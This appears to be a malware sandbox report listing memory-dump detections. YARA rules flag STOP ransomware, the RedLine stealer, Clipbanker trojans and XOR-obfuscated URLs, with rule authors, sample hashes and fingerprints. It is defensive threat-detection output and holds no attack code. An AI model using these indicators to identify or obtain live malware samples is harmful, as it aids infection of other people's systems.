Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
